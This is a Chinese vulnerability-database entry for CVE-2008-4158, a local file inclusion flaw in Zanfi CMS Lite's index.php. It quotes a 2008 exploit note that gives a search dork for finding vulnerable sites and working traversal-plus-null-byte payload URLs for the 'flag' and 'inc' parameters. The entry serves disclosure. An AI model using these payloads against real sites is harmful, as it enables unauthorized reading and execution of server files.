zanfi_solutions zanfi_solutions zanfi_cms_lite 路径游历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116079 漏洞类型 路径遍历
发布时间 2008-09-10 更新时间 2008-09-22
CVE编号 CVE-2008-4158 CNNVD-ID CNNVD-200809-272
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6413
https://www.securityfocus.com/bid/84828
https://cxsecurity.com/issue/WLB-2008090150
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-272
|漏洞详情
ZanfiCMSlite1.2的index.php存在多个目录遍历漏洞。远程攻击者可以通过(1)flag和(2)inc参数中的一个..(dotdot)来包含和执行任意本地文件。
|漏洞EXP
############################################################################################################
[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
[+]Discovered by SirGod
[+]MorTal TeaM
[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
############################################################################################################
 
[+] Dork : Powered by: Zanfi Solutions

[+] Local File Inclusion

   PoC :

    http://[target]/[Path]index.php?flag=[Local File]%00

   Example :

    http://127.0.0.1/index.php?flag=../../../autoexec.bat%00


   PoC :
 
    http://[target]/[Path]/index.php?inc=[Local File]%00

   Example :

    http://127.0.0.1/index.php?inc=../../../autoexec.bat%00

############################################################################################################

# milw0rm.com [2008-09-10]
|受影响的产品
Zanfi Solutions Zanfi CMS Lite 1.2.2
|参考资料

来源:XF
名称:zanficmslite-index-file-include(45027)
链接:http://xforce.iss.net/xforce/xfdb/45027
来源:MILW0RM
名称:6413
链接:http://www.milw0rm.com/exploits/6413
来源:SREASON
名称:4290
链接:http://securityreason.com/securityalert/4290